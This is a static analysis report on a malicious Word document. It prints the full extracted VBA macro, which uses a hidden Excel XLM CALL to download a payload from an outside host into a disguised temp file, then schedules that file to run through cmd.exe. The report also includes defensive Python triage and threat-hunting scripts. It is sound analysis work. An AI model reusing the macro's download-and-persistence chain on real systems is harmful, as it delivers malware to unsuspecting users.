Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 36a5b169d86aaa33…

MALICIOUS

Office (OOXML)

Size: 23.4 KB   Created: 2021-06-04 17:58:00 UTC   Authoring application: Microsoft Office Word 16.0000   First seen: 2021-06-13
MD5: bc68125efd29a1fb70bf09ffbfabf494   SHA-1: 5ff6117aab34251f0629caab7d5709e8b9d7bbed   SHA-256: 36a5b169d86aaa3365274386521167cb598d007d18ac83bfc8553946454fee2c
Risk score: 290

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer
T1053.005 Scheduled Task/Job: Scheduled Task (not in the automated mapping; the Schedule.Service registration in the extracted script supports it)

The VBA does not auto-execute: its only entry point is CommandButton1_Click, the click handler of an MSForms CommandButton embedded in the document (see the Attribute VB_Control line in the extracted module), so the victim must enable macros and then press the button. On click it creates a hidden Excel.Application instance with CreateObject (Visible = False) and calls ExecuteExcel4Macro with an XLM CALL() formula that invokes urlmon!URLDownloadToFileA to save http://dumpco.re/lab/messagebox.dmp to %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{...}.tmp, a name styled after the ~WRF{GUID}.tmp temporary files Word keeps in that folder but filled with a random 8-4-4-12 upper-case alphanumeric string from the r() helper. It then uses the Schedule.Service COM object to register a task named UpdateTask (flags 6 = TASK_CREATE_OR_UPDATE, logon type 3 = TASK_LOGON_INTERACTIVE_TOKEN, Hidden = False so the task is visible in Task Scheduler) with a single time trigger 1200 seconds (20 minutes) after registration that runs C:\Windows\System32\cmd.exe /c start <dropped file> /c vshost.exe; everything after the dropped file's path is passed through as arguments to it. This is downloader/dropper behaviour with delayed execution handed to the Task Scheduler instead of Shell or WScript.Shell, which keeps those keywords out of the macro. One caveat for dynamic analysis: the StartBoundary is assembled with Right(..., 2) on unpadded date parts, so any single-digit month, day, hour, minute or second yields a string such as 2021-6-4T9:5:7 that is not a valid ISO 8601 dateTime, and registration may fail on those runs.
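The chain summarised above can be recovered from the macro text alone. The Python below is an added example written for this report, not part of the analysis tool or of the sample: it flattens the VBA string expressions statically (so the XLM CALL() formula and the cmd.exe arguments are rendered with <name> placeholders where a runtime value would go), splits the CALL() into DLL, export, type string and arguments, decodes the Task Scheduler enumeration values the macro passes, and classifies the entry point as auto-executing or user-driven. SAMPLE_VBA is the extracted macro trimmed to the relevant statements; the constant names come from taskschd.h; the placeholder syntax and the AUTO_EXEC list are this example's own choices.

```python
"""Static triage of VBA macro text for the VBA-to-XLM download bridge and the
Task Scheduler persistence used by this sample. Input is macro source only
(e.g. olevba output); nothing from the document is executed."""
import re

# Sample input: the relevant statements of the macro extracted from this
# report's word/vbaProject.bin, trimmed (the r() helper is omitted).
SAMPLE_VBA = r'''
Private Sub CommandButton1_Click()
    p = Environ("USERPROFILE") & "\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{" & r(8) & "-" & r(4) & "-" & r(4) & "-" & r(12) & "}.tmp"
    Set x = CreateObject("Excel.Application")
    x.Visible = False
    x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
    x.Quit
    Set service = CreateObject("Schedule.Service")
    Dim trigger: Set trigger = triggers.Create(1)
    Dim Action: Set Action = td.Actions.Create(0)
    Action.Path = "C:\Windows\System32\cmd.exe"
    Action.Arguments = "/c start " & p & " /c vshost.exe"
    Call service.GetFolder("\").RegisterTaskDefinition("UpdateTask", td, 6, , , 3)
End Sub
'''

# Task Scheduler 2.0 enumerations (taskschd.h) for the numeric arguments the
# macro passes; only the members needed here are listed.
TASK_CREATION = {1: "TASK_VALIDATE_ONLY", 2: "TASK_CREATE", 4: "TASK_UPDATE", 6: "TASK_CREATE_OR_UPDATE"}
TASK_LOGON = {0: "TASK_LOGON_NONE", 1: "TASK_LOGON_PASSWORD", 2: "TASK_LOGON_S4U", 3: "TASK_LOGON_INTERACTIVE_TOKEN"}
TRIGGER_TYPE = {0: "TASK_TRIGGER_EVENT", 1: "TASK_TRIGGER_TIME", 8: "TASK_TRIGGER_BOOT", 9: "TASK_TRIGGER_LOGON"}
ACTION_TYPE = {0: "TASK_ACTION_EXEC", 5: "TASK_ACTION_COM_HANDLER"}
# Procedures Office runs on its own; any other entry point needs user interaction.
AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "document_open", "document_close", "workbook_open"}

VBA_STRING = re.compile(r'"((?:[^"]|"")*)"')  # a VBA literal; "" inside it is an escaped quote

def render_vba_expr(expr):
    """Flatten a VBA string-concatenation expression without running it: literals
    are unescaped and identifiers joined with & become <name> placeholders."""
    def placeholders(gap):
        return "".join("<%s>" % i for i in re.findall(r"[A-Za-z_]\w*", gap))
    out, pos = [], 0
    for m in VBA_STRING.finditer(expr):
        out.append(placeholders(expr[pos:m.start()]) + m.group(1).replace('""', '"'))
        pos = m.end()
    return "".join(out) + placeholders(expr[pos:])

def parse_xlm_call(formula):
    """Split an XLM CALL(dll, export, types, args...) formula. In the type string the
    first letter is the return type and the rest are the argument types
    (J = 32-bit integer, C = null-terminated ANSI string)."""
    m = re.match(r"\s*=?\s*CALL\((.*)\)\s*$", formula, re.S)
    if not m:
        return None
    args, cur, quoted = [], [], False
    for ch in m.group(1):          # split on commas outside quotes, dropping the quotes
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            args.append("".join(cur).strip()); cur = []
        else:
            cur.append(ch)
    args.append("".join(cur).strip())
    return {"dll": args[0], "export": args[1], "types": args[2], "args": args[3:]}

def triage(vba):
    """Collect the indicators a reviewer wants from the macro text."""
    f = {"entry_points": [], "xlm_calls": [], "urls": [], "triggers": [], "actions": [],
         "task": None, "task_args": None, "drop_path": None}
    excel = visible_false = False
    for raw in vba.splitlines():
        line = raw.strip()
        for m in re.finditer(r"\bSub\s+(\w+)\s*\(", line):
            kind = "auto" if m.group(1).lower() in AUTO_EXEC else "user-interaction"
            f["entry_points"].append((m.group(1), kind))
        excel |= bool(re.search(r'CreateObject\("Excel\.Application"\)', line, re.I))
        visible_false |= bool(re.search(r"\.Visible\s*=\s*False", line, re.I))
        if m := re.search(r"ExecuteExcel4Macro\s*(.*)$", line, re.I):
            call = parse_xlm_call(render_vba_expr(m.group(1)))
            if call:
                f["xlm_calls"].append(call)
                f["urls"] += [a for a in call["args"] if re.match(r"https?://", a, re.I)]
        if m := re.search(r"triggers\.Create\((\d+)\)", line, re.I):
            f["triggers"].append(TRIGGER_TYPE.get(int(m.group(1)), m.group(1)))
        if m := re.search(r"Actions\.Create\((\d+)\)", line, re.I):
            f["actions"].append(ACTION_TYPE.get(int(m.group(1)), m.group(1)))
        if m := re.search(r'RegisterTaskDefinition\(\s*"([^"]*)"\s*,\s*\w+\s*,\s*(\d+)\s*,[^,]*,[^,]*,\s*(\d+)\s*\)', line, re.I):
            f["task"] = {"name": m.group(1), "flags": TASK_CREATION.get(int(m.group(2)), m.group(2)),
                         "logon": TASK_LOGON.get(int(m.group(3)), m.group(3))}
        if m := re.search(r"\.Arguments\s*=\s*(.*)$", line, re.I):
            f["task_args"] = render_vba_expr(m.group(1))
        if m := re.match(r"\w+\s*=\s*(Environ\(.*)$", line, re.I):   # drop path built from an env var
            f["drop_path"] = render_vba_expr(re.sub(r'Environ\("(\w+)"\)', r'"%\1%"', m.group(1)))
    f["hidden_excel"] = excel and visible_false   # Excel automated with its window hidden
    return f

if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print("%-13s %s" % (k, v))
```

Run against the macro, the outputs that matter are entry_points showing a user-interaction handler rather than an auto-exec one, the parsed CALL to urlmon!URLDownloadToFileA with the URL and the <p> placeholder for the drop path, the rendered drop path %USERPROFILE%\...\~WRF{<r>-<r>-<r>-<r>}.tmp, and the decoded registration (TASK_CREATE_OR_UPDATE with TASK_LOGON_INTERACTIVE_TOKEN). parse_xlm_call is generic and also takes the Shell32!ShellExecute form the OLE_VBA_XLM_CALL_INJECTION rule mentions.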

Heuristics (8)

  • VBA project inside OOXML (medium, 6 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA (critical) OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        x.Visible = False
        x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
        x.Quit
  • VBA ActiveX event launches decoded Excel4 macro (critical) OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection; it is a high-confidence macro stager, not a specific Office parser CVE.
    Caveat for this sample: the event is CommandButton1_Click, which fires only when the user presses the button rather than on layout or paint, and the CALL() formula is passed as a plain string literal with no Replace/Split/Join decoding, so the generic rule text overstates both the auto-firing and the obfuscation here. The VBA-to-XLM bridge itself is present as described.
    Matched line in script
        x.Visible = False
        x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
        x.Quit
  • VBA injects an Excel-4 macro CALL to a download/exec API (critical) OLE_VBA_XLM_CALL_INJECTION
    VBA writes Excel-4 (XLM) =CALL() formulas targeting urlmon URLDownloadToFile / Shell32 ShellExecute and runs them. This VBA-to-XLM bridge downloads and executes a payload while keeping the API names out of normal VBA keyword scanning.
    Matched line in script
        Set x = CreateObject("Excel.Application")
        x.Visible = False
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set x = CreateObject("Excel.Application")
        x.Visible = False
  • cmd.exe reference in VBA (high) OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Dim Action: Set Action = td.Actions.Create(0)
        Action.Path = "C:\Windows\System32\cmd.exe"
        Action.Arguments = "/c start " & p & " /c vshost.exe"
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Private Sub CommandButton1_Click()
        p = Environ("USERPROFILE") & "\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{" & r(8) & "-" & r(4) & "-" & r(4) & "-" & r(12) & "}.tmp"
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Only the first entry is a network indicator: it is the URLDownloadToFileA target inside the XLM CALL() string and the only external host the sample contacts. The remaining schemas.microsoft.com / schemas.openxmlformats.org entries are XML namespace URIs declared in the OOXML parts; none of them appears in the 1,900-byte extracted macro, so the "Referenced by macro" tag on those lines is an extractor labelling artefact and they should not be treated as IOCs.
    • http://dumpco.re/lab/messagebox.dmp  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex  Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d  Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cex  Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid  Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash  Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  Referenced by macro

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1900 bytes
SHA-256: b9635b89b89d2aeb456123512213e0ed8be039f851e483abedbb00f3fc227d93
Preview script (first 1,000 lines of the extracted script; the module is 44 lines, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Private Function r(l As Integer) As String
    For i = 1 To l
        Randomize
        If Int(2 * Rnd + 0) = 1 Then
            r = r & Chr(Int((90 - 65 + 1) * Rnd + 65))
        Else
            r = r & Chr(Int((57 - 48 + 1) * Rnd + 48))
        End If
    Next i
End Function

Private Sub CommandButton1_Click()
    p = Environ("USERPROFILE") & "\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{" & r(8) & "-" & r(4) & "-" & r(4) & "-" & r(12) & "}.tmp"

    Set x = CreateObject("Excel.Application")
    x.Visible = False
    x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
    x.Quit
    
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Dim td: Set td = service.NewTask(0)
    td.settings.StartWhenAvailable = True
    td.settings.Hidden = False
    Dim triggers: Set triggers = td.triggers
    Dim trigger: Set trigger = triggers.Create(1)
    Dim startTime: ts = DateAdd("s", 1200, Now)
    startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
    trigger.StartBoundary = startTime
    trigger.ID = "TimeTriggerId"
    Dim Action: Set Action = td.Actions.Create(0)
    Action.Path = "C:\Windows\System32\cmd.exe"
    Action.Arguments = "/c start " & p & " /c vshost.exe"
    Call service.GetFolder("\").RegisterTaskDefinition("UpdateTask", td, 6, , , 3)
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 26112 bytes
SHA-256: 57cbcb83a246dae7fc4cc5be7c86f81c206b56dda793532bb4cf70cab62b7f8a
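For responders, the task the macro registers is the host-side artefact to look for. The Python below is an added example, not part of this report or of any vendor tool: it checks an exported task definition (for instance the output of schtasks /query /tn UpdateTask /xml, or any other task export) for the combination the extracted script produces, namely an Exec action of cmd.exe /c start pointing into Word's INetCache\Content.Word folder at a ~WRF{...}.tmp name with the r() helper's 8-4-4-12 alphanumeric pattern, a TimeTrigger (the script hard-codes the trigger ID TimeTriggerId and the task name UpdateTask), Hidden = false, and a StartBoundary that may be malformed because of the unpadded date assembly. SAMPLE_TASK_XML is constructed to mirror what the script registers; the user name, the random file name and the time in it are made up.

```python
"""Hunt for the persistence this macro leaves on a host: a Task Scheduler task whose
Exec action is cmd.exe /c start <~WRF{...}.tmp> under Word's INetCache folder.
Input is a task XML export; a constructed one is embedded for a stand-alone run."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed export mirroring what the macro registers (trigger ID, Hidden value and
# the cmd.exe action come from the extracted script; path and time are invented).
# A real schtasks export starts with an XML declaration and is UTF-16; read such a
# file as bytes (ET.parse(path)) instead of decoding it to str first.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger id="TimeTriggerId">
      <StartBoundary>2021-06-13T12:30:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Settings>
    <StartWhenAvailable>true</StartWhenAvailable>
    <Hidden>false</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\cmd.exe</Command>
      <Arguments>/c start C:\Users\alice\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{K3J9QZ7A-4B2C-9D1E-Q8W7E6R5T4Y3}.tmp /c vshost.exe</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# The macro's r() emits upper-case A-Z / 0-9 in 8-4-4-12 groups. A real GUID has five
# hex groups (8-4-4-4-12), so four groups that may contain non-hex letters single out
# files created by this macro rather than by Word itself.
FAKE_WRF = re.compile(r"~WRF\{[A-Z0-9]{8}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{12}\}\.tmp")
ISO_BOUNDARY = re.compile(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d+)?(Z|[+-]\d{2}:\d{2})?")

def looks_like_fake_wrf(text):
    return FAKE_WRF.search(text) is not None

def is_iso_boundary(value):
    """The macro builds StartBoundary with Right(..., 2) on unpadded parts, so a
    single-digit field produces e.g. 2021-6-4T9:5:7, which is not a valid dateTime."""
    return ISO_BOUNDARY.fullmatch(value or "") is not None

def hunt_task(xml_text):
    """Return the indicators found in one exported task definition."""
    root = ET.fromstring(xml_text)
    hits = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = ex.findtext("t:Arguments", "", NS) or ""
        if cmd.lower().endswith("cmd.exe") and re.search(r"\bstart\b", args, re.I):
            hits.append("cmd.exe used as a launcher via start: " + args)
        if re.search(r"INetCache\\Content\.Word\\", args, re.I):
            hits.append("payload launched from Word's INetCache\\Content.Word folder")
        if looks_like_fake_wrf(args):
            hits.append("~WRF name with the macro's 8-4-4-12 non-GUID pattern")
    trigger_ids, bad_boundaries = [], []
    for tr in root.findall(".//t:Triggers/t:TimeTrigger", NS):
        trigger_ids.append(tr.get("id"))
        sb = tr.findtext("t:StartBoundary", "", NS)
        if not is_iso_boundary(sb):
            bad_boundaries.append(sb)
    hidden = (root.findtext(".//t:Settings/t:Hidden", "", NS) or "").strip().lower() == "true"
    return {"hits": hits, "trigger_ids": trigger_ids, "bad_boundaries": bad_boundaries, "hidden": hidden}

if __name__ == "__main__":
    for k, v in hunt_task(SAMPLE_TASK_XML).items():
        print("%-15s %s" % (k, v))
```

Three hits together (cmd.exe /c start, the Content.Word folder, the four-group ~WRF name) are specific to this macro; any one of them alone is a weaker signal, since Word legitimately writes ~WRF{GUID}.tmp files in that folder and cmd.exe /c start appears in benign tasks. A task whose StartBoundary fails is_iso_boundary is itself worth noting: it would mean the registration call reached the scheduler with the macro's unpadded timestamp.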